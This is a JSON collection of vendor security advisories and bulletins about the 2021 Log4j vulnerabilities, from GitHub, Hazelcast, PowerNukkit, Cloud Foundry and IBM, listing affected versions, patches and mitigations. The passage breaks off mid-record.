{"github": [{"lastseen": "2022-04-19T19:29:43", "description": "### Summary\nThe version used of Log4j, the library used for logging by PowerNukkit, is subject to a remote code execution vulnerability via the ldap JNDI parser.\nIt's well detailed at [CVE-2021-44228](https://github.com/advisories/GHSA-jfh8-c2jp-5v3q) and CVE-2021-45105(https://github.com/advisories/GHSA-p6xc-xr62-6r2g).\n\n### Impact\nMalicious client code could be used to send messages and cause remote code execution on the server.\n\n### Patches\nPowerNukkit `1.5.2.1` is a patch-release that only updates the Log4j version to `2.17.0` and should be used instead of `1.5.2.0`.\nAll versions prior to `1.5.2.1` are affected and are not patched.\n\n### Workarounds\nIf you can't upgrade, you can use the `-Dlog4j2.formatMsgNoLookups=true` startup argument as remediation, as this prevents the vulnerability from happening.\n\n### References\nhttps://github.com/advisories/GHSA-jfh8-c2jp-5v3q\nhttps://github.com/advisories/GHSA-p6xc-xr62-6r2g\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [the PowerNukkit repository](https://github.com/PowerNukkit/PowerNukkit/issues)\n", "cvss3": {}, "published": "2022-01-06T18:31:23", "type": "github", "title": "Remote code injection, Improper Input Validation and Uncontrolled Recursion in Log4j library", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2021-44228", "CVE-2021-45105"], "modified": "2022-04-19T19:03:18", "id": "GHSA-3QPM-H9CH-PX3C", "href": "https://github.com/advisories/GHSA-3qpm-h9ch-px3c", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-04-22T17:57:29", "description": "### Impact\nA highly critical 0-day exploit (CVE-2021-44228) is found in Apache log4j 2 library on December 9, 2021.\n\nThis affects Apache log4j versions from 2.0-beta9 to 2.14.1 (inclusive). \n\nThis vulnerability allows a remote attacker to execute code on the server if the system logs an attacker-controlled string value with the attacker's JNDI LDAP server lookup.\n\nAnother vulnerability related to the same library, which was discovered on 12/14/2021 (CVE-2021-45046) and revealed another Remote Code Execution vulnerability, has been investigated by Hazelcast team as well and it is found that it does not affect Hazelcast Products under default configurations. \n\nThe finding of CVE-2021-45105 on 12/14/2021, which can cause a Denial of Service attack, was investigated by Hazelcast team and it is confirmed that it does not affect Hazelcast Products under default configurations. \n\nThe finding of CVE-2021-44832 on 12/28/2021, which is a medium vulnerability, is investigated by our security team as well, and not considered to be as critical. It requires attacker to be able to modify logging configuration, which means attacker can modify the filesystem and/or can already execute arbitrary code which is more of a general security breach rather than something log4j specific.\n\nNote that Hazelcast IMDG and IMDG Enterprise itself is not affected.\n\nHowever, given version distributions are considered to be vulnerable since related ZIP and TGZ distributions contain a vulnerable Hazelcast Management Center version.\n\n### Patches\nCVE-2021-44228 is fixed in log4j 2.15.0.\nCVE-2021-45046 is fixed in log4j 2.16.0.\nCVE-2021-45105 is fixed in log4j 2.17.0.\nCVE-2021-44832 is fixed in log4j 2.17.1.\n\nAs of 12/21/2021, Hazelcast team has released a new version of all affected products that upgrades log4j to 2.17.0 as listed below: \nHazelcast Management Center 4.2021.12-1, Hazelcast Management Center 5.0.4.\nHazelcast IMDG and IMDG Enterprise 4.0.5, 4.1.8 and 4.2.4.\nHazelcast Jet 4.5.3.\nHazelcast Platform 5.0.2.\n\nAs of 01/06/2022, Hazelcast Management Center 4.2022.01 with the updated log4j 2.17.1 is released. log4j2.17.1 will be included in Management Center 5.1 that is expected to be released in February. \n\nHazelcast recommends upgrading to the latest versions available.\n\n### Workarounds\nFor users that an upgrade is not an option, below mitigations can be applied.\n\n#### Disabling lookups via Environment Variable \nSetting the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS=true .\nThis option is the easiest to apply for containerized environments.\n\n#### Disabling lookups in log4j2 configuration\nAnother good option since there is no need to replace JARs or no need to modify logging configuration file, users who cannot upgrade to 2.17.0 can mitigate the exposure by:\n\nUsers of Log4j 2.10 or greater may add `-Dlog4j2.formatMsgNoLookups=true `as a command line option or add `-Dlog4j2.formatMsgNoLookups=true` in a `log4j2.component.properties` file on the classpath to prevent lookups in log event messages.\nUsers since Log4j 2.7 may specify `%m{nolookups}` in the PatternLayout configuration to prevent lookups in log event messages.\nAs an example; users deploying Hazelcast Management Center via helm charts can do the following to disable lookups and restart in one command:\n\n`helm upgrade <release-name> hazelcast/hazelcast --set mancenter.javaOpts=\"<javaOpts> -Dlog4j2.formatMsgNoLookups=true\"`\n\nWhere <release-name> is the release name and <javaOpts> is existing java options user has added previously.\n\n#### Removing the JndiLookup from classpath\nRemove the JndiLookup and JndiManager classes from the log4j-core jar. Note that removal of the JndiManager will cause the JndiContextSelector and JMSAppender to no longer function.\n\n### References\nhttps://nvd.nist.gov/vuln/detail/CVE-2021-44228\nhttps://nvd.nist.gov/vuln/detail/CVE-2021-45046\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105\nhttps://nvd.nist.gov/vuln/detail/CVE-2021-44832\nhttps://logging.apache.org/log4j/2.x/index.html\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [our repo](https://github.com/hazelcast/hazelcast)\n* Slack us at [Hazelcast Community Slack](https://slack.hazelcast.com/)\n", "cvss3": {}, "published": "2022-01-21T23:25:04", "type": "github", "title": "Security Advisory for \"Log4Shell\"", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-04-22T17:07:23", "id": "GHSA-V57X-GXFJ-484Q", "href": "https://github.com/advisories/GHSA-v57x-gxfj-484q", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-01-19T17:27:15", "description": "**_January 19, 2022 update: We have added details about the latest GitHub Enterprise Server release and Log4j**_\n\n \n_Today we released new versions of GitHub Enterprise Server ([3.3.2](<https://docs.github.com/en/enterprise-server@3.3/admin/release-notes#3.3.2>), [3.2.7](<https://docs.github.com/en/enterprise-server@3.2/admin/release-notes#3.2.7>), [3.1.15](<https://docs.github.com/en/enterprise-server@3.1/admin/release-notes#3.1.15>), [3.0.23](<https://docs.github.com/en/enterprise-server@3.0/admin/release-notes#3.0.23>)), which update our Log4j dependency to version 2.17.1. Our initial configuration-based mitigation, detailed and released in GitHub Enterprise Server versions [3.3.1](<https://docs.github.com/en/enterprise-server@3.3/admin/release-notes#3.3.1>), [3.2.6](<https://docs.github.com/en/enterprise-server@3.2/admin/release-notes#3.2.6>), [3.1.14](<https://docs.github.com/en/enterprise-server@3.1/admin/release-notes#3.1.14>), and [3.0.22](<https://docs.github.com/en/enterprise-server@3.0/admin/release-notes#3.0.22>), still fully mitigates the risk of the Log4j vulnerabilities CVE-2021-44228, CVE-2021-45046, CVE-2021-45105, and CVE-2021-44832. We elected to update to this latest version of Log4j as part of our normal release cycle. This upgrade will decrease false positives from file-based vulnerability scanners._\n\n \n\n**_December 17, 2021 update: we have added details of our continued response to CVE-2021-44228 and newly-discovered variants in Log4j**_\n\n \n_GitHub is tracking the latest updates regarding Log4j 2.15 and the subsequent release of Log4j 2.16 and CVE-2021-45046. This week, we have continued to monitor the impact of these variants across our products and infrastructure. Additionally, the GitHub Security Lab has engaged in further analysis to understand our products\u2019 exposure and to actively review and evaluate the effectiveness of our previous mitigations. At this time, we have not identified any additional risk or exposure to GitHub internally or to our products.\n\nDetailed updates for our products are below, with no new action required by users at this time.\n\n### GitHub Enterprise Server[](<https://github.blog/2021-12-13-githubs-response-to-log4j-vulnerability-cve-2021-44228/#github-enterprise-server>)\n\nElasticsearch is currently the only known exposure to Log4j vulnerabilities in GitHub Enterprise Server. We have internally validated that our mitigation approach for CVE-2021-44228 in GitHub Enterprise Server (released on December 13 in patch version [3.3.1](<https://docs.github.com/en/enterprise-server@3.3/admin/release-notes#3.3.1>), [3.2.6](<https://docs.github.com/en/enterprise-server@3.2/admin/release-notes#3.2.6>), [3.1.14](<https://docs.github.com/en/enterprise-server@3.1/admin/release-notes#3.1.14>), and [3.0.22](<https://docs.github.com/en/enterprise-server@3.0/admin/release-notes#3.0.22>)) also mitigates CVE-2021-45046 and other currently-published variants impacting Log4j. Our releases follow Elasticsearch\u2019s mitigation [suggestions](<https://discuss.elastic.co/t/apache-log4j2-remote-code-execution-rce-vulnerability-cve-2021-44228-esa-2021-31/291476>) and do **not** require an immediate update to Log4j 2.16.\n\nThe mitigations detailed in our December 13, 2021 post below remain effective and should be followed to secure instances of GitHub Enterprise Server.\n\n### GitHub.com and GitHub Enterprise Cloud[](<https://github.blog/2021-12-13-githubs-response-to-log4j-vulnerability-cve-2021-44228/#github-com-and-github-enterprise-cloud>)\n\nOn December 14, we finalized our rollout of mitigations for our use of Elasticsearch within GitHub.com and GitHub Enterprise Cloud. We validated this mitigation protects against both CVE-2021-44228 and CVE-2021-45046 in the context of Elasticsearch's use of Log4j. No exploitation has been identified due to our use of Elasticsearch.\n\nIn addition to Elasticsearch, we have continued investigating our impact from other third-party services in our infrastructure and are rolling out remediation and vendor recommendations as they become available. We are actively monitoring our telemetry for signs of exploitation and have not detected any successful exploitation at this time._\n\n* * *\n\n## December 13, 2021: our response to CVE-2021-44228[](<https://github.blog/2021-12-13-githubs-response-to-log4j-vulnerability-cve-2021-44228/#december-13-2021-our-response-to-cve-2021-44228>)\n\nOn Thursday, December 9, 2021, GitHub was made aware of a vulnerability in the Log4j logging framework, [CVE-2021-44228](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>). We immediately initiated our incident response process to determine our usage of this framework and its impact across GitHub, our products, and our infrastructure. To assist the community in identifying their usage of the vulnerable Log4j library, we also issued a [GitHub Security Advisory](<https://github.com/advisories/GHSA-jfh8-c2jp-5v3q>) and Dependabot alerts containing general vulnerability details.\n\nThis post summarizes the results of our investigation to date and our recommended next steps for customers.\n\n### GitHub Enterprise Server[](<https://github.blog/2021-12-13-githubs-response-to-log4j-vulnerability-cve-2021-44228/#github-enterprise-server>)\n\nIn GitHub Enterprise Server\u2019s recommended configuration, CVE-2021-44228 is only exposed to authenticated users. If an instance has been configured to not use [private mode](<https://docs.github.com/en/enterprise-server@3.3/admin/configuration/configuring-your-enterprise/enabling-private-mode>), this vulnerability may also be exposed to unauthenticated users. Customers should consider immediately taking one of two steps below to secure their instances of GitHub Enterprise Server.\n\n 1. Upgrade to a new version of GitHub Enterprise Server that contains changes to mitigate the Log4j vulnerability. The new releases that mitigate this vulnerability are [3.3.1](<https://docs.github.com/en/enterprise-server@3.3/admin/release-notes#3.3.1>), [3.2.6](<https://docs.github.com/en/enterprise-server@3.2/admin/release-notes#3.2.6>), [3.1.14](<https://docs.github.com/en/enterprise-server@3.1/admin/release-notes#3.1.14>), and [3.0.22](<https://docs.github.com/en/enterprise-server@3.0/admin/release-notes#3.0.22>).\n 2. Upgrade an existing GitHub Enterprise Server instance to the latest patch release with a hotpatch by [following our hotpatch instructions](<https://docs.github.com/en/enterprise-server@3.3/admin/enterprise-management/updating-the-virtual-machine-and-physical-resources/upgrading-github-enterprise-server#upgrading-with-a-hotpatch>). This method will allow the instance to be upgraded without a maintenance window.\n\n### GitHub.com and GitHub Enterprise Cloud[](<https://github.blog/2021-12-13-githubs-response-to-log4j-vulnerability-cve-2021-44228/#github-com-and-github-enterprise-cloud>)\n\nFollowing the public vulnerability disclosure, we took immediate action on the evening of Friday, December 10 to begin mitigating any impact to GitHub.com and GitHub Enterprise Cloud. We reviewed telemetry and deployed additional monitoring, neither of which have detected any successful exploitation at this time. We continue to monitor the situation for any new developments. No action by users of GitHub.com or GitHub Enterprise Cloud is required in order to continue safely using GitHub.com.\n\n### Conclusion[](<https://github.blog/2021-12-13-githubs-response-to-log4j-vulnerability-cve-2021-44228/#conclusion>)\n\nWe are continuing to investigate our exposure to this vulnerability and will provide further updates if any new risk to our users or our products is identified.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T19:06:34", "type": "github", "title": "GitHub\u2019s response to Log4j vulnerability CVE-2021-44228", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-19T16:28:57", "id": "GITHUB:070AFCDE1A9C584654244E41373D86D8", "href": "https://github.blog/2021-12-13-githubs-response-to-log4j-vulnerability-cve-2021-44228/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-27T00:09:11", "description": "Apache Log4j2 versions 2.0-alpha1 through 2.16.0 (excluding 2.12.3) did not protect from uncontrolled recursion from self-referential lookups. This allows an attacker with control over Thread Context Map data to cause a denial of service when a crafted string is interpreted. This issue was fixed in Log4j 2.17.0 and 2.12.3.\n\n\n# Affected packages\nOnly the `org.apache.logging.log4j:log4j-core` package is directly affected by this vulnerability. The `org.apache.logging.log4j:log4j-api` should be kept at the same version as the `org.apache.logging.log4j:log4j-core` package to ensure compatability if in use.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-12-18T18:00:07", "type": "github", "title": "Improper Input Validation and Uncontrolled Recursion in Apache Log4j2", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-45105"], "modified": "2022-04-26T20:58:03", "id": "GHSA-P6XC-XR62-6R2G", "href": "https://github.com/advisories/GHSA-p6xc-xr62-6r2g", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}], "cloudfoundry": [{"lastseen": "2022-01-06T11:39:13", "description": "**Severity**\n\nCritical\n\n**Vendor**\n\nCloud Foundry Foundation\n\n**Description**\n\nA critical vulnerability in Apache Log4j identified by CVE-2021-44228 has been publicly disclosed . Log4j versions prior to 2.15.0 are subject to a remote code execution vulnerability via the ldap JNDI parser and may allow for remote code execution in impacted cloud foundry products.\n\nThis is an ongoing event, please check this advisory for frequent updates as they develop. The advisory has been updated to cover for CVE-2021-45105 too which was later identified in log4j versions below 2.17.0 .\n\n**Affected Cloud Foundry Products and Versions**\n\n_Severity is critical unless otherwise noted._\n\n * UAA\n * Credhub\n * Cf-for-k8s\n * Cf-deployment\n * PHP buildpack\n * Java buildpack\n\n**Mitigation**\n\nUsers of affected products are strongly encouraged to follow the mitigations below. The Cloud Foundry project recommends upgrading the following releases( for both the above CVEs):\n\n * UAA-Upgrade all versions to 75.13.0 or greater\n * Credhub \u2013 Upgrade all versions to 2.11.0 or greater\n * Cf-for-k8s \u2013 Upgrade all versions to v5.4.2 or greater\n * Cf-deployment \u2013 Upgrade all versions to 17.1.0 or greater\n * PHP- buildpack \u2013 Upgrade all versions to 4.4.54 or greater\n * Java buildpack \u2013 Upgrade all versions to 4.47 or greater\n\n**References:**\n\n[https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228 ](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>)\n\n<https://github.com/advisories/GHSA-jfh8-c2jp-5v3q>\n\n**History**\n\n2021-12-13: Initial vulnerability report published.\n\n2021-12-14: Updated with patch details of Cf-for-k8s\n\n2021-12-15: Updated credhub, UAA and Php buildpack versions with latest log4j 2.16 versions\n\n2021-12-18: Updated cf-for-k8s, cf-deployment, Java buildpack versions with latest log4j 2.16 versions\n\n2022-01-06: Updated UAA, Java buildpack, PHP- buildpack, Cf-for-k8s versions for fixes of CVE-2021-45105.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-12T00:00:00", "type": "cloudfoundry", "title": "Log4j vulnerabilities (CVE-2021-44228 and CVE-2021-45105 ) impact on Cloud Foundry Products | Cloud Foundry", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45105"], "modified": "2021-12-12T00:00:00", "id": "CFOUNDRY:690C01663F820378948F8CF2E2405F72", "href": "https://www.cloudfoundry.org/blog/log4j-vulnerability-cve-2021-44228-impact-on-cloud-foundry-products/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "ibm": [{"lastseen": "2022-02-10T00:00:00", "description": "## Summary\n\nThe APM v8.1.4.0 Server installs an Online Help application that contains Log4j v2.3. A vulnerability was found in this version of Log4j that is documented by CVE-2021-44228 and fixed in Log4j v2.17.1.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Cloud APM, Base Private| 8.1.4 \nIBM Cloud APM, Advanced Private| 8.1.4 \n \n\n\n## Remediation/Fixes\n\nThe vulnerable version of Log4j v2.3 can be replaced by Log4j v2.17.1 by following the procedure described at <https://www.ibm.com/support/pages/node/6526216>\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n05 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSTFXA\",\"label\":\"IBM Monitoring\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"8.1.4\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-05T22:38:17", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Log4j (CVE-2021-45105) affects the IBM Performance Management product", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45105"], "modified": "2022-01-05T22:38:17", "id": "382442D01890BE0F397DB0132A6B09339C6A137724C837A5E2907ACB61EA374D", "href": "https://www.ibm.com/support/pages/node/6538478", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-28T22:11:05", "description": "## Summary\n\nThere are vulnerabilities in the Apache Log4j open source library which is used by SPSS Collaboration and Deployment Services for logging of messages and traces. These issues have been addressed. \n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nSPSS Collaboration and Deployment Services| 8.3 \n \n\n\n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerabilities now by installing the fix listed.**\n\n_Product_\n\n| _VRMF_| _APAR_| _Remediation/First Fix_ \n---|---|---|--- \nSPSS Collaboration and Deployment Services| \n\n8.3.0.0\n\n| \n\nPH42959\n\n| \n\n[8.3.0.0-IM-SCaDS-IF005](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=SPSS&product=ibm/Information+Management/SPSS+Collaboration+and+Deployment+Services&release=8.3.0.0&platform=All&function=fixId&fixids=8.3.0.0-IM-SCaDS-IF005&login=true> \"8.3.0.0-IM-SCaDS-IF005\" ) \n \n**The fix needs to be applied to these components: \n**\n\nSPSS Collaboration and Deployment Services Repository Server\n\nSPSS Collaboration and Deployment Services Remote Scoring Server\n\nSPSS Collaboration and Deployment Services Remote Process Server\n\nSPSS Collaboration and Deployment Services Deployment Manager\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n22 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. \"Affected Products and Versions\" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SS69YH\",\"label\":\"SPSS Collaboration and Deployment Services\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"8.3\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-22T15:04:37", "type": "ibm", "title": "Security Bulletin: Vulnerabilities in Apache Log4j affects SPSS Collaboration and Deployment Services", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": 